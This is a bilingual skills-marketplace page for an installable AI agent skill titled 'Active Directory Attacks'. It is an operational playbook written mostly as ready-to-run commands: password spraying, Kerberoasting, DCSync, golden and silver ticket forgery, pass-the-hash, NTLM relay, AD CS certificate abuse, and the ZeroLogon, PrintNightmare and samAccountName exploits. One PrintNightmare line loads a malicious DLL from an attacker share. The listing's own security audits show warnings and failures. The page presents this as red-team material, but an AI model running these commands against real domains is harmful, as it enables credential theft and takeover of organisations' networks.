Active Directory攻击技术指南：Kerberos攻击、横向移动与权限提升实战

active-directory-attacks by sickn33/antigravity-awesome-skills

102 周安装量

27,100 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/sickn33/antigravity-awesome-skills --skill active-directory-attacks

网络协议分析测试安全

🇨🇳中文介绍

Active Directory 攻击

目的

提供针对 Microsoft Active Directory 环境的全面攻击技术。涵盖红队行动和渗透测试中的侦察、凭证收集、Kerberos 攻击、横向移动、权限提升和域控获取。

输入/先决条件

Kali Linux 或 Windows 攻击平台
域用户凭证（用于大多数攻击）
对域控制器的网络访问权限
工具：Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec

输出/交付物

域枚举数据
提取的凭证和哈希值
用于身份冒充的 Kerberos 票据
域管理员访问权限
持久化访问机制

必备工具

工具	用途
BloodHound	AD 攻击路径可视化
Impacket	Python AD 攻击工具集
Mimikatz	凭证提取
Rubeus	Kerberos 攻击
CrackMapExec	网络利用
PowerView	AD 枚举
Responder	LLMNR/NBT-NS 投毒

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

步骤 1: Kerberos 时钟同步

Kerberos 要求时钟同步（±5 分钟）：

# 检测时钟偏差
nmap -sT 10.10.10.10 -p445 --script smb2-time

# 在 Linux 上修正时钟
sudo date -s "14 APR 2024 18:25:16"

# 在 Windows 上修正时钟
net time /domain /set

# 在不改变系统时间的情况下伪造时钟
faketime -f '+8h' <command>

步骤 2: 使用 BloodHound 进行 AD 侦察

# 启动 BloodHound
neo4j console
bloodhound --no-sandbox

# 使用 SharpHound 收集数据
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass

# Python 收集器（从 Linux）
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all

步骤 3: PowerView 枚举

# 获取域信息
Get-NetDomain
Get-DomainSID
Get-NetDomainController

# 枚举用户
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset

# 枚举组
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member

# 查找本地管理员访问权限
Find-LocalAdminAccess -Verbose

# 用户追踪
Invoke-UserHunter
Invoke-UserHunter -Stealth

# 使用 kerbrute
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123

# 使用 CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success

提取服务账户 TGS 票据并离线破解：

# Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# CrackMapExec
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt

# 使用 hashcat 破解
hashcat -m 13100 hashes.txt rockyou.txt

针对启用了"不需要 Kerberos 预认证"的账户：

# Impacket
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat

# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# 使用 hashcat 破解
hashcat -m 18200 hashes.txt rockyou.txt

直接从 DC 提取凭证（需要 Replicating Directory Changes 权限）：

# Impacket
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt

# Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator

Kerberos 票据攻击

票据传递（黄金票据）

使用 krbtgt 哈希为任意用户伪造 TGT：

# 首先通过 DCSync 获取 krbtgt 哈希
# Mimikatz - 创建黄金票据
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt

# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local

为特定服务伪造 TGS：

# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt

# Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH

# CrackMapExec
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth

将 NTLM 哈希转换为 Kerberos 票据：

# Impacket
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache

# Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt

Responder + ntlmrelayx

# 启动 Responder（禁用 SMB/HTTP 以进行中继）
responder -I eth0 -wrf

# 启动中继
ntlmrelayx.py -tf targets.txt -smb2support

# LDAP 中继用于委派攻击
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access

crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt

证书服务攻击（AD CS）

ESC1 - 配置错误的模板

# 查找易受攻击的模板
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10

# 利用 ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local

# 使用证书进行身份验证
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

ESC8 - Web 注册中继

ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

ZeroLogon (CVE-2020-1472)

# 检查漏洞
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon

# 利用
python3 cve-2020-1472-exploit.py DC01 10.10.10.10

# 提取哈希
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass

# 恢复密码（重要！）
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD

PrintNightmare (CVE-2021-1675)

# 检查漏洞
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'

# 利用（需要托管恶意 DLL）
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'

samAccountName 欺骗 (CVE-2021-42278/42287)

# 自动化利用
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell

攻击	工具	命令
Kerberoast	Impacket	`GetUserSPNs.py domain/user:pass -request`
AS-REP Roast	Impacket	`GetNPUsers.py domain/ -usersfile users.txt`
DCSync	secretsdump	`secretsdump.py domain/admin:pass@DC`
Pass-the-Hash	psexec	`psexec.py domain/user@target -hashes :HASH`
Golden Ticket	Mimikatz	`kerberos::golden /user:Admin /krbtgt:HASH`
Spray	kerbrute	`kerbrute passwordspray -d domain users.txt Pass`

在 Kerberos 攻击前与 DC 同步时间
拥有有效的域凭证以进行大多数攻击
记录所有被攻陷的账户

因过度密码喷洒而锁定账户
未经批准修改生产 AD 对象
在无文档记录的情况下留下黄金票据

运行 BloodHound 以发现攻击路径
在中继攻击前检查 SMB 签名
验证 CVE 利用的补丁级别

示例 1：通过 Kerberoasting 攻陷域

# 1. 查找具有 SPN 的服务账户
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10

# 2. 请求 TGS 票据
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt

# 3. 破解票据
hashcat -m 13100 tgs.txt rockyou.txt

# 4. 使用破解的服务账户
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10

示例 2：NTLM 中继到 LDAP

# 1. 启动针对 LDAP 的中继
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access

# 2. 触发身份验证（例如，通过 PrinterBug）
python3 printerbug.py domain.local/user:pass@target 10.10.10.12

# 3. 使用创建的机器账户进行 RBCD 攻击

问题	解决方案
时钟偏差过大	与 DC 同步时间或使用 faketime
Kerberoasting 返回空结果	没有具有 SPN 的服务账户
DCSync 访问被拒绝	需要 Replicating Directory Changes 权限
NTLM 中继失败	检查 SMB 签名，尝试 LDAP 目标
BloodHound 为空	验证收集器是否使用正确的凭证运行

关于委派攻击、GPO 滥用、RODC 攻击、SCCM/WSUS 部署、ADCS 利用、信任关系以及 Linux AD 集成等高级技术，请参阅 references/advanced-attacks.md。

本技能适用于执行概述中描述的工作流程或操作。

🇺🇸English

Active Directory Attacks

Purpose

Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.

Inputs/Prerequisites

Kali Linux or Windows attack platform
Domain user credentials (for most attacks)
Network access to Domain Controller
Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec

Outputs/Deliverables

Domain enumeration data
Extracted credentials and hashes
Kerberos tickets for impersonation
Domain Administrator access
Persistent access mechanisms

Essential Tools

Tool	Purpose
BloodHound	AD attack path visualization
Impacket	Python AD attack tools
Mimikatz	Credential extraction
Rubeus	Kerberos attacks
CrackMapExec	Network exploitation
PowerView	AD enumeration
Responder	LLMNR/NBT-NS poisoning

Core Workflow

Step 1: Kerberos Clock Sync

Kerberos requires clock synchronization (±5 minutes):

# Detect clock skew
nmap -sT 10.10.10.10 -p445 --script smb2-time

# Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"

# Fix clock on Windows
net time /domain /set

# Fake clock without changing system time
faketime -f '+8h' <command>

Step 2: AD Reconnaissance with BloodHound

# Start BloodHound
neo4j console
bloodhound --no-sandbox

# Collect data with SharpHound
.\SharpHound.exe -c All
.\SharpHound.exe -c All --ldapusername user --ldappassword pass

# Python collector (from Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all

Step 3: PowerView Enumeration

# Get domain info
Get-NetDomain
Get-DomainSID
Get-NetDomainController

# Enumerate users
Get-NetUser
Get-NetUser -SamAccountName targetuser
Get-UserProperty -Properties pwdlastset

# Enumerate groups
Get-NetGroupMember -GroupName "Domain Admins"
Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member

# Find local admin access
Find-LocalAdminAccess -Verbose

# User hunting
Invoke-UserHunter
Invoke-UserHunter -Stealth

Credential Attacks

Password Spraying

# Using kerbrute
./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123

# Using CrackMapExec
crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success

Kerberoasting

Extract service account TGS tickets and crack offline:

# Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

# CrackMapExec
crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt

# Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt

AS-REP Roasting

Target accounts with "Do not require Kerberos preauthentication":

# Impacket
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat

# Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt

# Crack with hashcat
hashcat -m 18200 hashes.txt rockyou.txt

DCSync Attack

Extract credentials directly from DC (requires Replicating Directory Changes rights):

# Impacket
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt

# Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt
lsadump::dcsync /domain:domain.local /user:Administrator

Kerberos Ticket Attacks

Pass-the-Ticket (Golden Ticket)

Forge TGT with krbtgt hash for any user:

# Get krbtgt hash via DCSync first
# Mimikatz - Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt

# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/Administrator@dc.domain.local

Silver Ticket

Forge TGS for specific service:

# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt

Pass-the-Hash

# Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH

# CrackMapExec
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth

OverPass-the-Hash

Convert NTLM hash to Kerberos ticket:

# Impacket
getTGT.py domain.local/user -hashes :NTHASH
export KRB5CCNAME=user.ccache

# Rubeus
.\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt

NTLM Relay Attacks

Responder + ntlmrelayx

# Start Responder (disable SMB/HTTP for relay)
responder -I eth0 -wrf

# Start relay
ntlmrelayx.py -tf targets.txt -smb2support

# LDAP relay for delegation attack
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access

SMB Signing Check

crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt

Certificate Services Attacks (AD CS)

ESC1 - Misconfigured Templates

# Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip 10.10.10.10

# Exploit ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local

# Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

ESC8 - Web Enrollment Relay

ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Critical CVEs

ZeroLogon (CVE-2020-1472)

# Check vulnerability
crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon

# Exploit
python3 cve-2020-1472-exploit.py DC01 10.10.10.10

# Extract hashes
secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass

# Restore password (important!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD

PrintNightmare (CVE-2021-1675)

# Check for vulnerability
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'

# Exploit (requires hosting malicious DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'

samAccountName Spoofing (CVE-2021-42278/42287)

# Automated exploitation
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell

Quick Reference

Attack	Tool	Command
Kerberoast	Impacket	`GetUserSPNs.py domain/user:pass -request`
AS-REP Roast	Impacket	`GetNPUsers.py domain/ -usersfile users.txt`
DCSync	secretsdump	`secretsdump.py domain/admin:pass@DC`
Pass-the-Hash	psexec	`psexec.py domain/user@target -hashes :HASH`
Golden Ticket	Mimikatz	`kerberos::golden /user:Admin /krbtgt:HASH`

Constraints

Must:

Synchronize time with DC before Kerberos attacks
Have valid domain credentials for most attacks
Document all compromised accounts

Must Not:

Lock out accounts with excessive password spraying
Modify production AD objects without approval
Leave Golden Tickets without documentation

Should:

Run BloodHound for attack path discovery
Check for SMB signing before relay attacks
Verify patch levels for CVE exploitation

Examples

Example 1: Domain Compromise via Kerberoasting

# 1. Find service accounts with SPNs
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10

# 2. Request TGS tickets
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt

# 3. Crack tickets
hashcat -m 13100 tgs.txt rockyou.txt

# 4. Use cracked service account
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10

Example 2: NTLM Relay to LDAP

# 1. Start relay targeting LDAP
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access

# 2. Trigger authentication (e.g., via PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10.10.12

# 3. Use created machine account for RBCD attack

Troubleshooting

Issue	Solution
Clock skew too great	Sync time with DC or use faketime
Kerberoasting returns empty	No service accounts with SPNs
DCSync access denied	Need Replicating Directory Changes rights
NTLM relay fails	Check SMB signing, try LDAP target
BloodHound empty	Verify collector ran with correct creds

Additional Resources

For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see references/advanced-attacks.md.

When to Use

This skill is applicable to execute the workflow or actions described in the overview.

Weekly Installs

102

Repository

sickn33/antigra…e-skills

GitHub Stars

27.1K

First Seen

Feb 21, 2026

Security Audits

Gen Agent Trust HubWarn SocketFail SnykFail

Installed on

opencode101

codex100

cursor99

gemini-cli99

amp99

kimi-cli99

Azure PostgreSQL 无密码身份验证配置指南：Entra ID 迁移与访问管理

34,800 周安装

Active Directory攻击技术指南：Kerberos攻击、横向移动与权限提升实战

🇨🇳中文介绍

Active Directory 攻击

目的

输入/先决条件

输出/交付物

必备工具

相关 Skills

核心工作流程

步骤 1: Kerberos 时钟同步

步骤 2: 使用 BloodHound 进行 AD 侦察

步骤 3: PowerView 枚举

凭证攻击

密码喷洒

Kerberoasting

AS-REP Roasting

DCSync 攻击

Kerberos 票据攻击

票据传递（黄金票据）

白银票据

哈希传递

OverPass-the-Hash

NTLM 中继攻击

Responder + ntlmrelayx

SMB 签名检查

证书服务攻击（AD CS）

ESC1 - 配置错误的模板

ESC8 - Web 注册中继

关键 CVE

ZeroLogon (CVE-2020-1472)

PrintNightmare (CVE-2021-1675)

samAccountName 欺骗 (CVE-2021-42278/42287)

快速参考

约束

示例

示例 1：通过 Kerberoasting 攻陷域

示例 2：NTLM 中继到 LDAP

故障排除

附加资源

使用时机

🇺🇸English

Active Directory Attacks

Purpose

Inputs/Prerequisites

Outputs/Deliverables

Essential Tools

Core Workflow

Step 1: Kerberos Clock Sync

Step 2: AD Reconnaissance with BloodHound

Step 3: PowerView Enumeration

Credential Attacks

Password Spraying

Kerberoasting

AS-REP Roasting

DCSync Attack

Kerberos Ticket Attacks

Pass-the-Ticket (Golden Ticket)

Silver Ticket

Pass-the-Hash

OverPass-the-Hash

NTLM Relay Attacks

Responder + ntlmrelayx

SMB Signing Check

Certificate Services Attacks (AD CS)

ESC1 - Misconfigured Templates

ESC8 - Web Enrollment Relay

Critical CVEs

ZeroLogon (CVE-2020-1472)

PrintNightmare (CVE-2021-1675)

samAccountName Spoofing (CVE-2021-42278/42287)

Quick Reference

Constraints

Examples

Example 1: Domain Compromise via Kerberoasting

Example 2: NTLM Relay to LDAP

Troubleshooting

Additional Resources

When to Use

最新 Skills